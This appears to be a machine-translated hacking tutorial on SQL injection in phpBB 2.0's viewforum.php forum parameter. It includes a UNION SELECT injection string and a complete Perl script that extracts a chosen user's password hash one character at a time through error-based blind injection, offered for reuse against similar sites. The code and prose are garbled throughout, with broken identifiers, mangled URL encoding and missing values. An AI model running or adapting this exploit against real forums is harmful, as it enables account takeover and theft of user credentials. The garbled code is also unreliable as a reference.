Php injection instance

Php injection instances it is difficult to see a complete article about php injection and use code on the Internet. so I have been hacking mysql and php for a few weeks, let's talk about my recess. I hope it will help you!
I believe that you are already very familiar with asp injection, and php injection is more difficult than asp, because the magic_gpc option of php is indeed a headache, so do not use quotation marks in injection, most php is combined with mysql, and the functional disadvantages of mysql prevent SQL njection attacks to some extent from the perspective of another person. I will give an example here, taking phpbb2.0 as an example:
One variable in viewforum. php is not filtered:
If (isset ($ HTTP_GET_VARS {
$ Forum_id = (isset ($ HTTP_GET_VARS
($ HTTP_POST_VARS }
Else if (isset ($ HTTP_GET_VARS ['forum '])
{
$ Forum_id = $ HTTP_GET_VARS ['forum'];
}
Else
{
$ Forum_id = ';
}
This is the forum, which is directly put into the query below:
If (! Empty ($ forum_id ))
{
$ SQL = "SELECT *
FROM ". FORUMS_TABLE ."
WHERE forum_id = $ forum_id ";
If (! ($ Result = $ db-> SQL _query ($ SQL )))
{
Message_die (GENERAL_ERROR, 'could not obtain forums information', ', _ LINE __, _ FILE __, $ SQL );
}
}
Else
{
Message_die (GENERAL_MESSAGE, 'Forum _ not_exist ');
}

If it is asp, I believe many people will inject it. if the forum specified by forum_id does not exist, $ result will be null. Therefore, the information of cocould not obtain forums information will be returned, so the following code cannot be executed.
//
// If the query doesn't return any rows this isn' t a valid forum. Inform
// The user.
//
If (! ($ Forum_row = $ db-> SQL _fetchrow ($ result )))
{
Message_die (GENERAL_MESSAGE, 'Forum _ not_exist ');
}

//
// Start session management
//
$ Userdata = session_pagestart ($ user_ip, $ forum_id) /*************************************** *

The key is the line with the asterisk. here is a function session_pagestart ($ user_ip, $ thispage_id), which is a function defined in session. php.

Long, it will not be completely pasted out. if you are interested, you can check it yourself. The key is that this function also calls session_begin (). the function call is as follows: session_begin ($ user_id, $ user_ip,

$ Thispage_id, TRUE), which is also defined in this file, with the following code
$ SQL = "UPDATE". SESSIONS_TABLE ."
SET session_user_id = $ user_id, session_start = $ current_time, session_time = $ current_time, session_page =

$ Page_id, session_logged_in = $ login
WHERE session_id = '". $ session_id ."'
AND session_ip = '$ user_ip '";
If (! ($ Result = $ db-> SQL _query ($ SQL) │! $ Db-> SQL _affectedrows ())
{
$ Session_id = md5 (uniqid ($ user_ip ));

$ SQL = "INSERT INTO". SESSIONS_TABLE ."
(Session_id, session_user_id, session_start, session_time, session_ip, session_page,

Session_logged_in)
VALUES ('$ session_id', $ user_id, $ current_time, $ current_time, '$ user_ip', $ page_id, $ login )";
If (! ($ Result = $ db-> SQL _query ($ SQL )))
{
Message_die (CRITICAL_ERROR, 'Error creating new session: session_begin ',', _ LINE __, _ FILE __,

$ SQL );
}


Here, session_page defines an integer in mysql ?? $ Page_id, that is, $ forum_id. if it is not an integer, an Error is reported, and an Error occurs.

Creating new session: session_begin prompt, so it is very important to specify this $ forum_id value, so I will specify it as:-1% 20 union % 20 select % ,,1, 2%, from % 20phpbb_users % 20 where % 20user_id = 20and % 20ord (substring (user_password,) = 57, no quotation marks! Although the specified forum_id does not exist, the returned query result may not be null. this is to guess whether the ascii value of the first password of user_id is 57, if yes, the $ result in the first piece of code in the article may not be empty, so the problematic function ession_pagestart is executed. if it is not an integer, an error will occur, the Error creating new session: session_begin is displayed, indicating that you guessed the first place. the other places are similar.

Without this error message, I think it is difficult to determine whether the injection is successful even if the injection is successful. it seems that the error message is helpful. the analysis is here, and a piece of test code is attached below. this code can be used to guess other similar md5 passwords with slight modifications. here I use the English version of the return condition, for Chinese and other languages, you only need to change the return condition.

Use HTTP: Request: Common;
Use HTTP: Response;
Use LWP: UserAgent;
$ Ua = new LWP: UserAgent;

Print "************************ n ";
Print "phpbb viewforum. php expn ";
Print "code by pinkeyesn ";
Print "www. icehack. comn ";
Print "************************* n ";
Print "please enter the weak file's url: n ";
Print "e.g. http: // 192.168.1.4/phpBB2/viewforum. phpn ";
$ Adr = ;
Chomp ($ adr );
Print "please enter the user_id that you want to crackn ";
$ U = ;
Chomp ($ u );
Print "work starting, please wait! N ";
@ Pink = (48 .. 57 );
@ Pink = (@ pink, 97 .. 102 );
For ($ j = 1; $ j <= 32; $ j ++ ){
For ($ I = 0; $ I <@ pink; $ I ++ ){
$ Url = $ adr ."? Forum =-1% 20 union % 20 select %, from % 20phpbb_users % 20 where %

20user_id = $ u % 20and % 20ord (substring (user_password, $ j, 1) = $ pink [$ I] ";
$ Request = HTTP: Request-> new ('GET', "$ url ");
$ Response = $ ua-> request ($ request );

If ($ response-> is_success ){
If ($ response-> content = ~ /Error creating new session /){
$ Pwd. = chr ($ pink [$ I]);
Print "$ pwdn ";
}

}
}
}
If ($ pwd ne ""){
Print "successfully, The password is $ pwd, good luckn ";}
Else {
Print "bad luck, work failed! N ";}

As for the recent phpbb2.0.6 search. php issue, you only need to slightly modify the above code.